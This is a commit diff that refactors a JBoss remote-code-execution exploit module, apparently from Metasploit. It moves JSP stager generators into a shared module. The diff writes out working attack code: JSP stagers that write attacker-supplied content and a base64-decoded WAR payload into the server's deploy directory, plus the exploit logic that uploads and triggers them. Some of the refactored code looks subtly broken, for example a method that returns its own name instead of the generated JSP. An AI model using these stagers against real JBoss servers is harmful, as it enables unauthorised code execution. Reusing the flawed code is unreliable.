Jboss file deployment repository refactorization

Moved lib/msf/http/jboss/bean_shell_script.rb to
lib/msf/http/jboss/script.rb. Moved head_stager_jsp to script.rb.
Removed stager_jsp to use the function from the mixin.

Author: us3r777

lib/msf/http/jboss.rb

@@ -5,13 +5,13 @@ module Msf
   module HTTP
     module JBoss
       require 'msf/http/jboss/base'
-      require 'msf/http/jboss/bean_shell_scripts'
+      require 'msf/http/jboss/scripts'
       require 'msf/http/jboss/bean_shell'
       require 'msf/http/jboss/deployment_file_repository'
 
       include Msf::Exploit::Remote::HttpClient
       include Msf::HTTP::JBoss::Base
-      include Msf::HTTP::JBoss::BeanShellScripts
+      include Msf::HTTP::JBoss::Scripts
       include Msf::HTTP::JBoss::BeanShell
       include Msf::HTTP::JBoss::DeploymentFileRepository
 

lib/msf/http/jboss/bean_shell_scripts.rb renamed to lib/msf/http/jboss/scripts.rb

@@ -1,6 +1,6 @@
 # -*- coding: binary -*-
 
-module Msf::HTTP::JBoss::BeanShellScripts
+module Msf::HTTP::JBoss::Scripts
 
   # Generates a Bean Shell Script.
   #
@@ -19,6 +19,43 @@ def generate_bsh(type, opts ={})
     bean_shell
   end
 
+  # Generate a stager JSP to write the second stager to the
+  # deploy/management direcotry. It is only used with HEAD/GET requests
+  # to overcome the size limit in those requests
+  #
+  # @param stager_base [String] The name of the base of the stager.
+  # @param stager_jsp [String] The name name of the jsp stager.
+  # @return [String] The JSP head stager.
+  def head_stager_jsp(stager_base, stager_jsp)
+    content_var = rand_text_alpha(8+rand(8))
+    file_path_var = rand_text_alpha(8+rand(8))
+    jboss_home_var = rand_text_alpha(8+rand(8))
+    fos_var = rand_text_alpha(8+rand(8))
+    bw_var = rand_text_alpha(8+rand(8))
+    head_stager_jsp_code = <<-EOT
+<%@page import="java.io.*,
+  java.util.*"
+%>
+<%
+  String #{jboss_home_var} = System.getProperty("jboss.server.home.dir");
+  String #{file_path_var} = #{jboss_home_var} + "/deploy/management/" + "#{stager_base}.war/" + "#{stager_jsp}" + ".jsp";
+  if (request.getParameter("#{content_var}") != null) {
+      try {
+        String parameterName = (String)(request.getParameterNames().nextElement());
+        #{content_var} = request.getParameter(parameterName);
+        FileWriter #{fos_var} = new FileWriter(#{file_path_var}, true);
+        BufferedWriter #{bw_var} = new BufferedWriter(#{fos_var});
+        #{bw_var}.write(#{content_var});
+        #{bw_var}.close();
+      }
+      catch(Exception e) { }
+  }
+%>
+    EOT
+
+    head_stager_jsp 
+  end
+
   # Generate a stager JSP to write a WAR file to the deploy/ directory.
   # This is used to bypass the size limit for GET/HEAD requests.
   #

modules/exploits/multi/http/jboss_deploymentfilerepository.rb

@@ -84,14 +84,7 @@ def exploit
     jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))
     app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))
     stager_base = rand_text_alpha(8+rand(8))
-    head_stager_jsp = rand_text_alpha(8+rand(8))
     stager_jsp  = rand_text_alpha(8+rand(8))
-    content_var = rand_text_alpha(8+rand(8))
-    decoded_var = rand_text_alpha(8+rand(8))
-    file_path_var = rand_text_alpha(8+rand(8))
-    jboss_home_var = rand_text_alpha(8+rand(8))
-    fos_var = rand_text_alpha(8+rand(8))
-    bw_var = rand_text_alpha(8+rand(8))
 
     p = payload
     mytarget = target
@@ -128,74 +121,18 @@ def exploit
 
     encoded_payload = Rex::Text.encode_base64(war_data).gsub(/\n/, '')
 
-    # The following jsp script will write the stager  to the
-    # deploy/management directory. It is only used with HEAD/GET requests
-    # to overcome the size limit in those requests
-    head_stager_jsp_code = <<-EOT
-<%@page import="java.io.*,
-  java.util.*"
-%>
-
-<%
-
-  String #{jboss_home_var} = System.getProperty("jboss.server.home.dir");
-  String #{file_path_var} = #{jboss_home_var} + "/deploy/management/" + "#{stager_base}.war/" + "#{stager_jsp}" + ".jsp";
-
-
-  if (request.getParameter("#{content_var}") != null) {
-
-      try {
-        String #{content_var} = "";
-        #{content_var} = request.getParameter("#{content_var}");
-        FileWriter #{fos_var} = new FileWriter(#{file_path_var}, true);
-        BufferedWriter #{bw_var} = new BufferedWriter(#{fos_var});
-        #{bw_var}.write(#{content_var});
-        #{bw_var}.close();
-      }
-      catch(Exception e)
-      {
-      }
-  }
-%>
-
-EOT
-
-    # The following jsp script will write the exploded WAR file to the deploy/
-    # directory or try to delete it
-    stager_jsp_code = <<-EOT
-<%@page import="java.io.*,
-    java.util.*,
-    sun.misc.BASE64Decoder"
-%>
-
-<%
-
-  String #{jboss_home_var} = System.getProperty("jboss.server.home.dir");
-  String #{file_path_var} = #{jboss_home_var} + "/deploy/management/" + "#{app_base}.war";
-
-
-  try {
-    String #{content_var} = "#{encoded_payload}";
-    byte[] #{decoded_var} = new BASE64Decoder().decodeBuffer(#{content_var});
-    FileOutputStream #{fos_var} = new FileOutputStream(#{file_path_var});
-    #{fos_var}.write(#{decoded_var});
-    #{fos_var}.close();
-  }
-  catch(Exception e)
-  {
-  }
-%>
-
-EOT
 
     # Depending on the type on the verb we might use a second stager
     if datastore['VERB'] == "POST" then
       print_status("Deploying stager for the WAR file")
-      res = upload_file(stager_base, stager_jsp, stager_jsp_code)
+      stager_contents = stager_jsp(app_base)
+      res = upload_file(stager_base, stager_jsp, stager_contents)
     else
       print_status("Deploying minimal stager to upload the payload")
-      res = upload_file(stager_base, head_stager_jsp, head_stager_jsp_code)
+      head_stager_jsp_name = rand_text_alpha(8+rand(8))
+      head_stager_contents = head_stager_jsp(stager_base, stager_jsp)
       head_stager_uri = "/" + stager_base + "/" + head_stager_jsp + ".jsp?"
+      res = upload_file(stager_base, head_stager_jsp_name, head_stager_contents)
 
       # We split the stager_jsp_code in multipe junks and transfer on the
       # target with multiple requests
@@ -216,7 +153,10 @@ def exploit
     if (res.code == 200 || res.code == 500)
       print_status("Calling stager to deploy the payload warfile (might take some time)")
       stager_uri = '/' + stager_base + '/' + stager_jsp + '.jsp'
-      stager_res = deploy('uri' => stager_uri)
+      payload_data = "#{rand_text_alpha(8+rand(8))}=#{Rex::Text.uri_encode(encoded_payload)}"
+      stager_res = deploy('uri' => stager_uri,
+                          'data' => payload_data,
+                          'method' => http_verb)
 
       print_status("Try to call the deployed payload")
       # Try to execute the payload by calling the deployed WAR file
@@ -247,5 +187,4 @@ def exploit
     end
   end
 
-
 end